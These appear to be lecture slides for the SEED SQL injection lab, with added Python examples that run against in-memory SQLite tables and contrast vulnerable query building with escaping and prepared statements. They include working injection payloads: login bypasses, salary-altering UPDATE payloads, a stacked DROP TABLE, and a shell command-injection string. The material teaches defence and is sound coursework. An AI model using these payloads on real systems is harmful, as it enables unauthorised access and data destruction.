
SQL Injection

Attack

SQL-slides Page 1
Outline

❖ Tutorial on SQL and Database


❖ SQL Injection Attack
❖ Similarity with Other Attacks
❖ Countermeasures (Prepared Statement)

❖ Reading: Chapter 12
❖ Lab: SQL Injection Attack Lab

Web Application Architecture

Browser -> Web Application Server -> Database

Lab Setup
The Labsetup/ Folder

Target website: www.seed-server.com

Add the following to /etc/hosts

Tutorial on SQL
and Database

The Database Container
❖ The Database's Dockerfile

❖ The docker-compose.yml file

Database Setup
❖ Log into MySQL
# mysql -u root -pdees    (the -p option takes the password directly after it, with no space; dees is the lab's root password)
mysql>

❖ Display all the databases


SHOW DATABASES;

❖ Create a database

❖ Create a table

❖ Insert records

Query Database
❖ SELECT statement

USE test_db;
SELECT * FROM mytable;

SELECT Name, Salary FROM mytable;

❖ Conditions: WHERE clause

SELECT * FROM mytable WHERE Name='Alice';

SELECT * FROM mytable WHERE Name='Alice' OR Salary>8000;

❖ A special condition
SELECT * FROM mytable WHERE 1=1;

Update Records
❖ The UPDATE statement

UPDATE mytable SET Salary=9999 WHERE Name='Alice';

Comments
❖ Comments in SQL statement: MySQL treats `#`, `-- ` (two dashes followed by a space) and `/* ... */` as comments. Everything after `#` or `-- ` on the same line is ignored by the parser, which is what makes a comment marker useful for cutting off the rest of a statement.

SQL Injection
Attack

How Web Application Interacts with Database

Browser -> Application Server -> Database

The browser sends the user's input (form fields, URL parameters) to the application server. The server-side code builds a SQL statement from that input and sends the statement to the database, which runs whatever it receives and returns the result. If the input can change the code of the statement rather than only its data, the application has a SQL injection vulnerability.

Logging In Without Password 1
❖ Attack objective
Can you log into Alice's account without knowing her password?

❖ SQL statement

Logging In Without Password 2
❖ Attack objective
You do not know any user's name. Can you still log into the application?

❖ SQL Statement
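
The two login bypasses above (a known name without its password, and no name at all), as an added example that is not part of the original slides or the SEED lab code. Python's sqlite3 module stands in for the lab's PHP/MySQL setup so the example runs offline; the `credential` table, its rows and the payloads are constructed for this example. One detail differs from the lab: it uses MySQL's `#` comment, while SQLite only understands `--` and `/* */`, so the payloads here end in `-- `.

```python
import sqlite3

# Constructed sample rows standing in for the lab's MySQL table; the names,
# passwords and salaries are made up for this example.
SAMPLE_USERS = [
    ("Alice", "seedalice", 20000),
    ("Bob", "seedbob", 30000),
    ("Ted", "seedted", 50000),
]


def make_db():
    """Create an in-memory database with a minimal credential table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE credential (name TEXT, password TEXT, salary INTEGER)")
    conn.executemany("INSERT INTO credential VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def build_login_query(name, password):
    """The vulnerable pattern: user input is spliced into the SQL text, so a
    quote in the input closes the literal and the rest is parsed as code."""
    return (f"SELECT name, salary FROM credential "
            f"WHERE name='{name}' AND password='{password}'")


def login_vulnerable(conn, name, password):
    """Return (name, salary) for the first matching row, or None."""
    return conn.execute(build_login_query(name, password)).fetchone()


# Attack 1: the victim's name is known. Closing the quote and opening a
# comment discards the password check (MySQL would accept '#' here too).
KNOWN_NAME_PAYLOAD = "Alice' -- "

# Attack 2: no name is known. An always-true condition matches every row,
# so the first row of the table is returned as the logged-in user.
NO_NAME_PAYLOAD = "' OR 1=1 -- "


if __name__ == "__main__":
    db = make_db()
    for name in (KNOWN_NAME_PAYLOAD, NO_NAME_PAYLOAD):
        print(build_login_query(name, "xyz"))
        print("  ->", login_vulnerable(db, name, "xyz"))
```

Print the statement the server actually sends before looking at the result: the injected text reads as ordinary SQL because, to the parser, it is ordinary SQL.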

Modify Database

Change Your Own Salary
❖ Attack objective
You are not happy with the salary you get. Can you change your own salary through the profile-change form?

❖ Profile-Change form and the SQL statement

Change Your Own Salary
❖ Attack objective
Your boss (Ted) did not increase your salary, you want to punish him
by changing his salary to $1.

❖ Profile-Change form and the SQL statement

Run an Arbitrary SQL Statement
❖ Attack objective
Use the SQL injection vulnerability to run an arbitrary SQL statement, for example by appending a second statement after a semicolon. Whether this works depends on the API the application calls: PHP's mysqli::query() sends a single statement and fails on stacked ones, while mysqli::multi_query() runs all of them.

❖ SQL Statement
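
The three profile-change attacks above (raise your own salary, set Ted's salary to $1, and run an extra statement), as an added example; this is not the lab's code. SQLite stands in for MySQL, the `credential` table and its rows are constructed, and the form is reduced to a single editable field, `nickname`. The stacked-statement attempt shows why "run an arbitrary statement" depends on the API: sqlite3's `execute()` refuses more than one statement, as PHP's `mysqli::query()` does, while `executescript()` behaves like `mysqli::multi_query()`.

```python
import sqlite3

# Constructed sample rows standing in for the lab's MySQL table.
SAMPLE_USERS = [("Alice", "alice", 20000), ("Ted", "boss", 50000)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE credential (name TEXT, nickname TEXT, salary INTEGER)")
    conn.executemany("INSERT INTO credential VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def update_profile_vulnerable(conn, user, nickname):
    """Profile-change handler: only 'nickname' is meant to be editable."""
    sql = f"UPDATE credential SET nickname='{nickname}' WHERE name='{user}'"
    conn.execute(sql)
    conn.commit()
    return sql  # returned so the statement that really ran can be inspected


def salary_of(conn, name):
    return conn.execute("SELECT salary FROM credential WHERE name=?", (name,)).fetchone()[0]


# Attack 1 (logged in as Alice): extend the SET list with a column the form
# never exposed. The application's own closing quote finishes our literal,
# so the original WHERE clause stays in place and only Alice's row changes.
RAISE_OWN_SALARY = "x', salary='99999"

# Attack 2: also supply a WHERE clause so the update hits Ted's row. The
# application's "WHERE name='Alice'" survives only inside the comment.
CUT_TED_SALARY = "x', salary=1 WHERE name='Ted' -- "

# Attack 3: a stacked statement that drops the table.
DROP_TABLE = "x'; DROP TABLE credential; -- "


def stacked_attack(conn, use_multi):
    """Run the DROP TABLE payload through a single-statement API or a
    multi-statement API and report what happened to the table."""
    sql = f"UPDATE credential SET nickname='{DROP_TABLE}' WHERE name='Alice'"
    try:
        if use_multi:
            conn.executescript(sql)   # like mysqli::multi_query()
        else:
            conn.execute(sql)         # like mysqli::query()
    except (sqlite3.Error, sqlite3.Warning):
        return "rejected"
    try:
        conn.execute("SELECT 1 FROM credential")
        return "survived"
    except sqlite3.OperationalError:
        return "table dropped"


if __name__ == "__main__":
    db = make_db()
    print(update_profile_vulnerable(db, "Alice", RAISE_OWN_SALARY), salary_of(db, "Alice"))
    print(update_profile_vulnerable(db, "Alice", CUT_TED_SALARY), salary_of(db, "Ted"))
    print("single-statement API:", stacked_attack(make_db(), use_multi=False))
    print("multi-statement API:", stacked_attack(make_db(), use_multi=True))
```

Note that the first payload deliberately omits its closing quote and relies on the one the application appends; the second needs a comment because it introduces its own WHERE clause and must hide the application's.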

SQL Injection Comic Strip

(Source: https://xkcd.com/327/)

Similarity with
Other
Vulnerabilities

SQL Injection and Cross-Site Scripting
❖ SQL Injection

❖ Cross-Site Scripting (JavaScript Injection)

Similarity with system()
❖ Vulnerability in using the system() function (shell command injection): user input is pasted into a command string that a shell then parses, so shell metacharacters such as `;` in the input become code, exactly as quotes and comment markers do in SQL.
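
The system() case above, as an added example (not from the slides or the lab). It uses Python's subprocess with `shell=True` in place of PHP's system(), assumes a POSIX shell is available, and the attacker's input is a constructed string. The safe variant applies the same idea as a prepared statement: the program receives its arguments as separate values, so no parser has to find the boundaries between code and data.

```python
import subprocess
import sys

# Constructed attacker input: a plausible name followed by a second command.
ATTACKER_NAME = "alice; echo INJECTED"


def greet_vulnerable(name):
    """Like system("echo Hello " . $name): the whole string is parsed by a
    shell, so ';' ends the echo command and starts another one."""
    out = subprocess.run(f"echo Hello {name}", shell=True,
                         capture_output=True, text=True, check=True)
    return out.stdout.strip()


def greet_safe(name):
    """No shell involved: the name travels as one argv element and the
    child program only ever sees it as data (a python one-liner is used as
    the child so the example needs nothing beyond the interpreter)."""
    out = subprocess.run(
        [sys.executable, "-c", "import sys; print('Hello', sys.argv[1])", name],
        capture_output=True, text=True, check=True)
    return out.stdout.strip()


if __name__ == "__main__":
    print(repr(greet_vulnerable(ATTACKER_NAME)))
    print(repr(greet_safe(ATTACKER_NAME)))
```

The vulnerable version returns two lines because two commands ran; the safe version returns one line containing the attacker's text verbatim, semicolon included.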

Countermeasures

Turning Code Into Data
Encoding Special Characters

❖ PHP's configuration (this is a php.ini setting, not Apache's): "magic_quotes_gpc = On" automatically escaped quotes in all request data. It was deprecated in PHP 5.3 and removed in PHP 5.4, so it is not available on a current PHP installation.

❖ PHP's solution: mysqli::real_escape_string() escapes the special characters of a string before it is placed inside a quoted SQL literal. The statement is still assembled from text, so this only helps where the value really is inside quotes.

Solving the Fundamental Problem
❖ Defense against the attacks on system()

❖ Defense against the XSS attack

Prepared Statements
❖ Motivation behind prepared statements: the three queries below share one piece of code and differ only in their data, so the database can parse the code once and have the data supplied separately for each run.

SELECT * FROM mytable WHERE name='Alice' OR age>20;


SELECT * FROM mytable WHERE name='Bob' OR age>30;
SELECT * FROM mytable WHERE name='Charlie' OR age>40;

❖ Using prepared statements

Defense Using Prepared Statement
❖ The vulnerable approach

❖ Using prepared statement
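
The vulnerable approach, the escaping countermeasure and the prepared statement side by side, as an added example; it is not the lab's PHP code. SQLite stands in for MySQL and the table rows are constructed. `sql_escape()` is a simplified stand-in for mysqli::real_escape_string() that only doubles single quotes; the `?` placeholders of Python's sqlite3 play the role of mysqli's prepare() / bind_param() / execute(). The last two functions go beyond the slide to show why escaping is not the fundamental fix: it does nothing for a value the application never put inside quotes.

```python
import sqlite3

# Constructed sample rows; SQLite stands in for the lab's MySQL server.
SAMPLE_USERS = [("Alice", "seedalice", 20000), ("Bob", "seedbob", 30000)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE credential (name TEXT, password TEXT, salary INTEGER)")
    conn.executemany("INSERT INTO credential VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_concat(conn, name, password):
    """The vulnerable approach: SQL text assembled from user input."""
    sql = f"SELECT name FROM credential WHERE name='{name}' AND password='{password}'"
    return conn.execute(sql).fetchone()


def sql_escape(value):
    """Escaping in the spirit of mysqli::real_escape_string(): doubling each
    single quote keeps the string literal closed. The statement is still
    built from text, so this is only safe where the value is quoted."""
    return value.replace("'", "''")


def login_escaped(conn, name, password):
    sql = (f"SELECT name FROM credential WHERE name='{sql_escape(name)}' "
           f"AND password='{sql_escape(password)}'")
    return conn.execute(sql).fetchone()


def login_prepared(conn, name, password):
    """Prepared statement: the code is fixed first and the data are bound
    afterwards, so a quote or comment in the data cannot become code."""
    sql = "SELECT name FROM credential WHERE name=? AND password=?"
    return conn.execute(sql, (name, password)).fetchone()


def salary_concat_unquoted(conn, limit):
    """Escaping cannot protect a value that is not inside quotes at all."""
    sql = f"SELECT name FROM credential WHERE salary > {sql_escape(limit)}"
    return conn.execute(sql).fetchall()


def salary_prepared(conn, limit):
    """The bound value is compared as a value, never parsed as SQL."""
    return conn.execute("SELECT name FROM credential WHERE salary > ?", (limit,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 -- "
    print("concat:  ", login_concat(db, payload, "x"))
    print("escaped: ", login_escaped(db, payload, "x"))
    print("prepared:", login_prepared(db, payload, "x"))
    print("unquoted concat:", salary_concat_unquoted(db, "0 OR 1=1"))
    print("prepared:       ", salary_prepared(db, "0 OR 1=1"))
```

Against the login query, escaping and the prepared statement both stop the `' OR 1=1` payload. Against the unquoted numeric comparison only the prepared statement holds: the escaper finds no quote to double, the payload reaches the parser unchanged, and `WHERE salary > 0 OR 1=1` returns every row.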

Review Questions
and Summary

Review Question 1

Review Question 2

Summary
❖ SQL statement

❖ SQL injection

❖ Countermeasures
